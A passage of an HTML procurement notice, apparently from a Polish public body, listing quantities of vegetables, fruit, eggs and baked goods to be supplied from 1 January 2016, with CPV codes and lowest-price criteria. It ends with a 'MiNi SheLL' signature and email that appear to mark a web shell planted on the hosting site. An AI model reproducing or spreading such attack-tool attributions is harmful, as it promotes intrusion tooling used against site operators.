29.	OGÓREK KISZONY		kg	150
30.	OGÓREK MAŁOSOLNY		kg	60
31.	OGÓREK ZIELONY		kg	250
32.	PAPRYKA ŚWIEŻA		kg	3
33.	PIECZARKI		kg	135
34.	PIETRUSZKA KORZEŃ Z NACIĄ		pęczki	180
35.	PIETRUSZKA KORZEŃ		kg	340
36.	PIETRUSZKA NATKA		pęczki	500
37.	POMARAŃCZE		kg	60
38.	POMIDORY		kg	450
39.	POR		szt.	150
40.	RZODKIEWKA		pęczki	300
41.	SAŁATA ZIELONA		szt.	240
42.	SAŁATA LODOWA		szt.	30
43.	SAŁATA OZDOBNA KARBOWANA		szt.	30
44.	SELER KORZEŃ		kg	570
45.	SELER KORZEŃ Z NACIĄ		szt.	100
46.	SZCZYPIOREK		pęczki	60
47.	ŚlIWKA SUSZONA		kg	2
48.	ŚLIWKI WĘGIERKA		kg	40
49.	TRUSKAWKA		kg	20
50.	WINOGRONA		kg	5
51.	ŻUREK ŚLĄSKI FOLIA 0,5 l		szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	JAJA Kl.JAKOŚCI A KAT.WAGOWA L/63-73/g		szt.	18 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> dostawa pieczywa i wyrobów piekarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	BUŁKA DROŻDŻOWA 160g		szt.	1 200
2.	BUŁKA TARTA  0,5KG		szt.	390
3.	BUŁKA ZWYKŁA 85 g		szt.	10 950
4.	CHLEB BALTONOWSKI 600 g		szt.	9 600
5.	CHLEB RAZOWY 400g		szt.	1 460
6.	CIASTO CZEKOLADOWE		kg	60
7.	FRANCUZ 400 g		szt.	794
8.	PĄCZEK 100 g		szt.	400
9.	PIERNIK		kg	12
10.	SERNIK KRAKOWSKI		kg	20
11.	STRUCLA MAKOWA		kg	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com